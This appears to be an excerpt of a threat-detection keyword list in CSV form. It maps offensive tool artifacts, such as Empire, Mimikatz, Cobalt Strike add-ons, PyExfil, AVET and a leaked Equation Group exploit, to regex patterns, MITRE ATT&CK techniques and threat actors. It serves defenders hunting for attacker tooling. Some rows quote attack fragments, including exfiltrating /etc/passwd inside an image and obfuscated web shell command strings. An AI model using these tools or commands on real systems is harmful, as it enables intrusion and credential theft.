"*EmpireCORSMiddleware*",".{0,1000}EmpireCORSMiddleware.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43108"
"*Empire-GUI.git*",".{0,1000}Empire\-GUI\.git.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","N/A","10","5","495","146","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z","43109"
"*Empire-master*",".{0,1000}Empire\-master.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43110"
"*empire-priv.key*",".{0,1000}empire\-priv\.key.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43111"
"*EmpireProject*",".{0,1000}EmpireProject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.","T1027 - T1059 - T1071 - T1070 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43112"
"*Empire-Sponsors.git*",".{0,1000}Empire\-Sponsors\.git.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43113"
"*empire-test-kalirolling*",".{0,1000}empire\-test\-kalirolling.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43114"
"*emptybowl.py*",".{0,1000}emptybowl\.py.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver  buffer overflow allows a string passed to popen() call to be controlled by an attacker  arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","1","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","43115"
"*-EmptyPassword-Users.txt*",".{0,1000}\-EmptyPassword\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","43116"
"*Emulates a rightclick on the given coordinates*",".{0,1000}Emulates\sa\srightclick\son\sthe\sgiven\scoordinates.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","43117"
"*enable_persistence.py*",".{0,1000}enable_persistence\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","43118"
"*Enable_Privilege /Process:* /Privilege:*",".{0,1000}Enable_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","43119"
"*EnableAllParentPrivileges.c*",".{0,1000}EnableAllParentPrivileges\.c.{0,1000}","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","43121"
"*EnableAllParentPrivileges.exe*",".{0,1000}EnableAllParentPrivileges\.exe.{0,1000}","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","43122"
"*EnableAllTokenPrivs.exe.log*",".{0,1000}EnableAllTokenPrivs\.exe\.log.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","43123"
"*Enabled_Users1.txt*",".{0,1000}Enabled_Users1\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","43124"
"*Enable-DuplicateToken*",".{0,1000}Enable\-DuplicateToken.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","43125"
"*EnableRDesktopImplant*",".{0,1000}EnableRDesktopImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43127"
"*Enable-SeAssignPrimaryTokenPrivilege*",".{0,1000}Enable\-SeAssignPrimaryTokenPrivilege.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43128"
"*Enable-SeDebugPrivilege*",".{0,1000}Enable\-SeDebugPrivilege.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43129"
"*Enable-SeDebugPrivilege*",".{0,1000}Enable\-SeDebugPrivilege.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","43130"
"*encdatavault2john.py*",".{0,1000}encdatavault2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43136"
"*encfs2john.py*",".{0,1000}encfs2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43137"
"*encode baseImage.jpg /etc/passwd newImage.jpg*",".{0,1000}encode\sbaseImage\.jpg\s\/etc\/passwd\snewImage\.jpg.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","#linux","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","43138"
"*encode_base64(xor_encrypt(""cmd /c *",".{0,1000}encode_base64\(xor_encrypt\(\""cmd\s\/c\s.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","43139"
"*encode_base64(xor_encrypt(""WScript.Shell""*",".{0,1000}encode_base64\(xor_encrypt\(\""WScript\.Shell\"".{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","43140"
"*encode_payload rc4 *.txt*",".{0,1000}encode_payload\src4\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","43141"
"*encode_xor_shellcode(*",".{0,1000}encode_xor_shellcode\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","43142"
"*EncodeGroup/AggressiveProxy*",".{0,1000}EncodeGroup\/AggressiveProxy.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","43143"
"*EncodeGroup/UAC-SilentClean*",".{0,1000}EncodeGroup\/UAC\-SilentClean.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","43144"
"*encodeScriptPolyglot*",".{0,1000}encodeScriptPolyglot.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","43145"
